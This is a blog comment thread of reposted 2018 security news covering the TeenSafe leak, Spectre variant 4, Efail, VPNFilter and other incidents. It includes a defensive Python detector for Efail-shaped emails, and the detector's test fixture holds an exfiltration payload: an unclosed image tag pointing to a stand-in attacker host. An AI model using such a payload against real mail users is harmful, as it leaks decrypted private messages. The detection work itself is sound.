    https://www.zdnet.com/article/teen-phone-monitoring-app-leaks-thousands-of-users-data/

    Exclusive: A server stored teenagers’ Apple ID email addresses and plaintext passwords.

    At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.

    The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.

    Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.

    Robert Wiggins, a UK-based security researcher who searches for public and exposed data, found two leaky servers.

    Both of the servers were pulled offline after ZDNet alerted the company.

    “We have taken action to close one of our servers to the public and begun alerting customers that could potentially be impacted,” a TeenSafe spokesperson told ZDNet on Sunday.

    The database stores the parent’s email address associated with TeenSafe, as well as their corresponding child’s Apple ID email address. It also includes the child’s device name — which is often just their name — and their device’s unique identifier.

    There were at least 10,200 records from the past three months containing customers’ data.

    TeenSafe claims to have over a million parents using the service.

    We contacted a dozen people over iMessage, one by one, to confirm their passwords.

    It’s not clear why the data, let alone passwords for teens’ Apple IDs, was stored in plaintext.

    The company claims on its website that it’s “secure” and uses encryption.

    How not to verify a data breach (and why some really want you to get ‘pwned’)
    Whatever you do, don’t break the law…
    https://www.zdnet.com/article/how-not-to-verify-a-data-breach/

    Just as hackers want verification for credibility or acclaim, some breach sites want news coverage to sell something. The hacked companies want to know so they can disaster-manage (companies get hacked because their security is bad, not because the hackers are always that good), and news outlets want the exclusive.

    But also — verification is important for the victims. The sooner victims know about data breaches, the sooner they can protect themselves.

    Make no mistake, verifying data isn’t an easy process. It’s time consuming, laborious, and not always fruitful.

    Logging into someone else’s account without permission is illegal in the US.

    Besides, that still wouldn’t be enough to verify a breach.

    When reporters verify breaches, they walk a line to ensure they’re not intrusive or inconveniencing people. One of the easiest ways to begin verifying a breach is by enumerating disposable Mailinator email accounts through a website’s password reset field. Reporters also have to examine the data

    This boom in hack reporting has in part led to a cycle of more awareness and coverage, which has led to more data breach monitoring and notification sites popping up.

    Reply
  36. Tomi Engdahl says:

    Microsoft, Google: We’ve found a fourth data-leaking Meltdown-Spectre CPU hole
    Design blunder exists in Intel, AMD, Arm, Power processors
    https://www.theregister.co.uk/2018/05/21/spectre_meltdown_v4_microsoft_google/

    A fourth variant of the data-leaking Meltdown-Spectre security flaws in modern processors has been found by Microsoft and Google researchers.

    These speculative-execution design blunders can be potentially exploited by malicious software running on a vulnerable device or computer.

    Variants 1 and 2 are known as Spectre (CVE-2017-5753, CVE-2017-5715), and variant 3 is Meltdown (CVE-2017-5754). Today, variant 4 (CVE-2018-3639) was disclosed by Microsoft and Google researchers.

    It affects modern out-of-order execution processor cores from Intel, AMD, and Arm, as well as IBM’s Power 8, Power 9, and System z CPUs. Bear in mind, Arm cores are used the world over in smartphones, tablets, and embedded electronics.

    The fourth variant can be potentially exploited by script files running within a program – such as JavaScript on a webpage in a browser tab.

    According to Intel, mitigations already released to the public for variant 1, which is the hardest vulnerability to tackle, should make attacks leveraging variant 4 much more difficult.

    So far, no known exploit code is circulating in the wild targeting the fourth variant.

    Another bug, CVE-2018-3640, was also disclosed: this is a rogue system register read, allowing normal programs to peek at hardware status flags and the like in registers that should only really be accessible by the operating system kernel, drivers, and hypervisors.

    Variant 4 is referred to as a speculative store bypass. It is yet another “wait, why didn’t I think of that?” design oversight in modern out-of-order-execution engineering.

    The name Spectre was chosen deliberately: it is like observing a ghost in the machine. Private data can be discerned by watching the cache being updated by the processor’s speculative execution engine. This speculation is crucial to running chips as fast as possible.

    Intel, Arm, et al response

    “Variant 4 uses speculative execution, a feature common to most modern processor architectures, to potentially expose certain kinds of data through a side channel,” said Leslie Culbertson, Intel’s executive veep of product security.

    “Starting in January, most leading browser providers deployed mitigations for Variant 1 in their managed runtimes – mitigations that substantially increase the difficulty of exploiting side channels in a web browser. These mitigations are also applicable to Variant 4 and available for consumers to use today.”

    According to Culbertson, Intel and others will issue new microcode and software tweaks to more fully counter malware exploiting the fourth variant.

    “We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.

    “This mitigation will be set to off-by-default, providing customers the choice of whether to enable it or not. We expect most industry software partners will likewise use the default-off option.

    If enabled, we’ve observed a performance impact of approximately 2-8 per cent.

    Arm will make available to system-on-chip designers updated blueprints for Cortex-A72, Cortex-A73, and Cortex-A75 cores that are resistant to Spectre variant 2, and the Cortex-A75 will be updated to resist Meltdown, aka variant 3.

    Red Hat today published a substantial guide to the fourth variant, its impact, and how it works. VMware also has an advisory and updates, here,

    We note that, so far, no malware has been seen attacking any of the Spectre and Meltdown holes in today’s chips, let alone this latest variant.

    Speculative Store Buffer Bypass in 3 minutes
    https://www.youtube.com/watch?v=Uv6lDgcUAC0

    Speculative Store Buffer Bypass is a security vulnerability that allows unauthorized users to steal sensitive information through websites. Similar to the Spectre and Meltdown threats in early 2018, it exploits speculative execution – a process most computers use to speed up routine tasks.

    Reply
  37. Tomi Engdahl says:

    FireEye Launches OAuth Attack Testing Platform
    https://www.securityweek.com/fireeye-launches-oauth-attack-testing-platform

    FireEye on Monday announced the availability of a platform to allow organizations and pentesters to check their ability to detect and respond to OAuth abuse attacks.

    OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user’s data without the need for credentials.

    “In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.

    In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).

    An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.

    Shining a Light on OAuth Abuse with PwnAuth
    https://www.fireeye.com/blog/threat-research/2018/05/shining-a-light-on-oauth-abuse-with-pwnauth.html

    Reply
  38. Tomi Engdahl says:

    Germany calls on chip and hardware makers to tackle processor flaws
    https://www.reuters.com/article/us-cyber-germany/germany-calls-on-chip-and-hardware-makers-to-tackle-processor-flaws-idUSKCN1IJ2H3

    Germany’s federal cyber agency called on chip and hardware-makers to address new vulnerabilities discovered in computer central processing units, but said no complete fix was possible at the moment.

    The BSI agency said its analysis showed the new flaws, dubbed Spectre-Next Generation, resembled the Meltdown and Spectre bugs discovered in January and could allow attackers to access personal data such as passwords and encryption keys.

    While no new attacks were known outside laboratories, there was a risk that attackers could develop new methods based on detailed information that had been disclosed, it added.

    Reply
  39. Tomi Engdahl says:

    Explaining Efail and Why It Isn’t the End of Email Privacy
    https://hackaday.com/2018/05/21/explaining-efail-and-why-it-isnt-the-end-of-email-privacy/

    Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.

    A team of researchers published a paper (PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.

    But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients, but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption altogether just makes no sense.

    Aside from the massive false alarm, Efail is a very interesting exploit.

    Efail Does Not Directly Exploit PGP

    In a nutshell, if an attacker is able to get access to a user’s encrypted email, they can modify the message in a specific way and send it back to the user. The user’s email client will then decrypt the message and (if the email client is rendering HTML tags) automatically send the decrypted message back to the attacker.

    The encryption itself is not broken in any way. It’s how the messages are processed by the user’s email client that introduces the vulnerability. Saying PGP is broken is just plain wrong.

    Efail Builds On the Concepts of Tracking Pixels

    Efail uses this kind of remote loading of images as the backchannel to exfiltrate the decrypted email. Other methods should also be possible. Efail takes advantage of the fact that the email client first has to decrypt an encrypted message in order to show it, and then it renders the HTML code in the message.

    Malleability Gadgets

    We’ve seen how simple it is to implement a direct exfiltration channel in order to decrypt email. In some email clients, that technique does not work, so the Efail paper describes a more generic way to introduce the exfiltration channel inside the actually encrypted data itself.

    Conclusion

    My hope is that the reader realizes two things: that the encryption of emails is still generically safe and that rendering HTML in emails is still not a good idea.

    To protect yourself against this vulnerability, and a lot of others, disable HTML rendering in your email client. Many email clients allow for this and/or have settings to disable the loading of remote content.

    Reply
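    The “direct exfiltration” shape described in the comment above (an existing encrypted part wrapped between two HTML parts, the first opening a remote image tag that is never closed) can be recognised from MIME structure alone, without decrypting anything. The following check is an added example written for this page, not code from Hackaday or from the Efail paper; the addresses, boundaries and the placeholder ciphertext in the sample messages are constructed.

```python
"""Added example (not from the Hackaday article or the Efail paper).

Flags the MIME shape used by Efail's direct-exfiltration variant: a
PGP/MIME encrypted part placed between two HTML parts, where the first
part opens an <img src="http://..."> tag that is never closed.  When a
client decrypts the middle part and renders all parts as one HTML
document, the plaintext ends up inside the image URL and is fetched from
the attacker's server.  This check only inspects structure; it never
decrypts.  All sample data below is constructed for the example."""
import email
import re
from email import policy

# A tag that is opened but never closed before the HTML part ends.
UNCLOSED_TAG = re.compile(r"<[A-Za-z][^<>]*$")
# Any remote resource reference (the tracking-pixel style backchannel).
REMOTE_REF = re.compile(r"""(?:src|href)\s*=\s*["']?\s*(?:https?:)?//""", re.I)


def _leaves(part):
    """Yield leaf parts in order; multipart/encrypted counts as one leaf."""
    if part.get_content_type() == "multipart/encrypted" or not part.is_multipart():
        yield part
        return
    for sub in part.get_payload():
        yield from _leaves(sub)


def find_efail_shape(raw: bytes) -> list:
    """Return finding codes for each encrypted part in a suspicious position."""
    parts = list(_leaves(email.message_from_bytes(raw, policy=policy.default)))
    findings = []
    for i, part in enumerate(parts):
        if part.get_content_type() != "multipart/encrypted":
            continue
        html_before = [p for p in parts[:i] if p.get_content_type() == "text/html"]
        html_after = [p for p in parts[i + 1:] if p.get_content_type() == "text/html"]
        if html_before:
            body = html_before[-1].get_content().rstrip()
            if UNCLOSED_TAG.search(body):
                findings.append("unclosed-tag-before-encrypted")
            if REMOTE_REF.search(body):
                findings.append("remote-content-before-encrypted")
        if html_before and html_after:
            findings.append("html-wraps-encrypted")
    return findings


# Constructed inner PGP/MIME part shared by both sample messages.
ENCRYPTED_PART = b"""\
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="INNER"

--INNER
Content-Type: application/pgp-encrypted

Version: 1
--INNER
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
(constructed placeholder, not a real ciphertext)
-----END PGP MESSAGE-----
--INNER--
"""

# Constructed message in the Efail direct-exfiltration shape.
EFAIL_SHAPED = (b"From: attacker@example.invalid\nTo: victim@example.invalid\n"
                b"MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary=\"OUTER\"\n\n"
                b"--OUTER\nContent-Type: text/html\n\n"
                b"<img src=\"http://attacker.example.invalid/\n"
                b"--OUTER\n" + ENCRYPTED_PART +
                b"--OUTER\nContent-Type: text/html\n\n\">\n--OUTER--\n")

# Constructed benign message: closed HTML note followed by an encrypted part.
BENIGN = (b"From: alice@example.invalid\nTo: bob@example.invalid\n"
          b"MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary=\"OUTER\"\n\n"
          b"--OUTER\nContent-Type: text/html\n\n<p>See the encrypted part.</p>\n"
          b"--OUTER\n" + ENCRYPTED_PART + b"--OUTER--\n")

if __name__ == "__main__":
    print("efail-shaped:", find_efail_shape(EFAIL_SHAPED))
    print("benign:", find_efail_shape(BENIGN))
```

A mail gateway or client plug-in can refuse to render, or strip to plain text, any message that produces findings; the same remote-content test also backs the article’s closing advice to disable remote loading.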
  40. Tomi Engdahl says:

    Comcast is (update: was) leaking the names and passwords of customers’ wireless routers
    https://techcrunch.com/2018/05/21/comcast-is-leaking-the-names-and-passwords-of-customers-wireless-routers/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook

    Comcast has just been caught in a major security snafu: revealing the passwords of its customers’ Xfinity-provided wireless routers in plaintext on the web. Anyone with a subscriber’s account number and street address number will be served up the Wi-Fi name and password via the company’s Xfinity internet activation service.

    Update: Comcast has taken down the service in question. “There’s nothing more important than our customers’ security,” a Comcast representative said in a statement.

    Reply
  41. Tomi Engdahl says:

    How to prevent a typo from making you an identity theft victim
    https://www.washingtonpost.com/news/get-there/wp/2018/05/03/how-to-prevent-a-typo-from-making-you-an-identity-theft-victim/?noredirect=on&utm_term=.276621c04784

    I’ve typed in an Internet address and with the slip of a finger ended up on some funky website. One typo.

    Scammers love typos. And to capitalize on them, they hijack popular web addresses and cybersquat on URLs that are a typo away from legitimate websites. It’s a scheme called “typosquatting,” and it is intended to trick Internet users, according to Fraud.org, a project of the National Consumers League.

    “If a user is unlucky enough to mistakenly type in the wrong address, they may be taken to a booby-trapped website filled with viruses and malware, or to a website that looks just like the legitimate website but is designed to gather their personal data for scammers,”

    Close to 12 million online users visited potentially dangerous websites during the first quarter of this year.

    Krebs warned readers that “malicious websites ending in ‘.cm’ that mimic some of the world’s most popular Internet destinations

    Here are two of the tips.
    — Double check what you’re typing.
    — Bookmark websites you visit often.

    Reply
  42. Tomi Engdahl says:

    Amazon facial recognition software raises privacy concerns with the ACLU
    https://techcrunch.com/2018/05/22/amazon-facial-recognition-software-raises-privacy-concerns-with-the-aclu/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook

    Amazon hasn’t exactly kept Rekognition under wraps. In late 2016, the software giant talked up its facial detection software in a relatively benign AWS post announcing that the tech was already being implemented by The Washington County Sheriff’s Office in Oregon for suspect identification.

    The ACLU of Northern California is shining more light on the tech this week.

    “raises profound civil liberties and civil rights concerns.”

    Reply
  43. Tomi Engdahl says:

    Teen monitoring app TeenSafe exposes thousands of passwords
    https://techcrunch.com/2018/05/21/teen-monitoring-app-teensafe-exposes-thousands-of-passwords/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook

    U.K.-based security researcher Robert Wiggins has found two exposed TeenSafe servers, leaking the passwords and information of some users of the monitoring service.

    TeenSafe is meant to protect teenagers by letting their parents monitor their texts, phone calls, web history, location and app downloads. The breach was first reported by ZDNet.

    According to the report, TeenSafe left two of their servers, which were hosted on AWS, exposed and viewable by anyone.

    Reply
  44. Tomi Engdahl says:

    FBI’s flawed phone tally blamed on programming error. 7,800 unbreakable mobes? Er, um…
    We meant 1,000. Maybe 2,000
    https://www.theregister.co.uk/2018/05/23/feds_flawed_phone_tally_blamed_on_programming_error/

    The FBI apparently gilded the lily in its long campaign against consumer cryptography, telling the world it held more locked phones than it did.

    At issue is the Feds’ claim that it’s seized 7,000 phones it can’t crack because they’re encrypted.

    He upped the ante in December 2017, telling a Congressional budget hearing the FBI couldn’t access the content of “approximately 7,800 mobile devices” in spite of having the legal authority to.

    However, the Washington Post is now reporting that number was “inflated”, and instead, the FBI only has between 1,000 and 2,000 phones.

    The WashPo said the error was discovered about a month ago, and since then the FBI has been trying to get a more accurate count, and an audit could take weeks.

    The agency gave the newspaper a statement blaming the error on “programming errors” that delivered “significant over-counting of the devices reported”.

    Reply
  45. Tomi Engdahl says:

    Jim Finkle / Reuters:
    Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …

    Cyber researchers, Ukraine warn of possible Russian attack
    https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9

    Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.

    The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.

    Cisco, which uncovered the campaign several months ago, alerted authorities in Ukraine and the United States before going public with its findings about the malware it dubbed VPNFilter.

    Cisco described the mechanisms that the malware uses to hide communications with hackers and a module that targets industrial networks like ones that operate electric grids, said Michael Daniel, chief executive officer of Cyber Threat Alliance, a nonprofit group.

    VPNFilter has infected devices in at least 54 countries, but by far the largest number is in Ukraine.

    Reply
  46. Tomi Engdahl says:

    Yubico and LastPass bring NFC-based two-factor authentication to the iPhone
    https://www.zdnet.com/article/yubico-and-lastpass-bring-nfc-based-two-factor-authentication-to-the-iphone/

    Popular password manager LastPass delivers the first iOS app with support for the YubiKey NEO hardware-based authentication key with NFC support.

    Reply
  47. Tomi Engdahl says:

    Exclusive: FBI Seizes Control of Russian Botnet
    https://amp.thedailybeast.com/exclusive-fbi-seizes-control-of-russian-botnet

    FBI agents armed with a court order have seized control of a key server in the Kremlin’s global botnet of 500,000 hacked routers, The Daily Beast has learned. The move positions the bureau to build a comprehensive list of victims of the attack, and short-circuits Moscow’s ability to reinfect its targets.

    The FBI counter-operation goes after “VPN Filter,” a piece of sophisticated malware linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.

    New VPNFilter malware targets at least 500K networking devices worldwide
    https://blog.talosintelligence.com/2018/05/VPNFilter.html

    Reply
  48. Tomi Engdahl says:

    VPNFilter: New Router Malware with Destructive Capabilities
    Unlike most other IoT threats, malware can survive reboot.
    https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware

    A new threat which targets a range of routers and NAS devices is capable of knocking out infected devices by rendering them unusable. The malware, known as VPNFilter, is unlike most other IoT threats because it is capable of maintaining a persistent presence on an infected device, even after a reboot. VPNFilter has a range of capabilities including spying on traffic being routed through the device. Its creators appear to have a particular interest in SCADA industrial control systems, creating a module which specifically intercepts Modbus SCADA communications.

    According to new research from Cisco Talos, activity surrounding the malware has stepped up in recent weeks and the attackers appear to be particularly interested in targets in Ukraine.

    Q: What devices are known to be affected by VPNFilter?

    A: To date, VPNFilter is known to be capable of infecting enterprise and small office/home office routers from Linksys, MikroTik, Netgear, and TP-Link, as well as QNAP network-attached storage (NAS) devices. These include:

    Linksys E1200
    Linksys E2500
    Linksys WRVS4400N
    Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
    Netgear DGN2200
    Netgear R6400
    Netgear R7000
    Netgear R8000
    Netgear WNR1000
    Netgear WNR2000
    QNAP TS251
    QNAP TS439 Pro
    Other QNAP NAS devices running QTS software
    TP-Link R600VPN

    Q: How does VPNFilter infect affected devices?

    A: Most of the devices targeted are known to use default credentials and/or have known exploits, particularly for older versions. There is no indication at present that the exploit of zero-day vulnerabilities is involved in spreading the threat.

    Reply
  49. Tomi Engdahl says:

    Troy Hunt and Have I Been Pwned
    http://www.bosslevelpodcast.com/troy-hunt-and-have-i-been-pwned/

    My guest for this episode is Troy Hunt, well known security expert and creator of haveibeenpwned.com. It’s a service which allows you to check whether your email has been leaked as a part of a data breach.

    We talk about online security, including securing your accounts and using a password manager.

    Reply
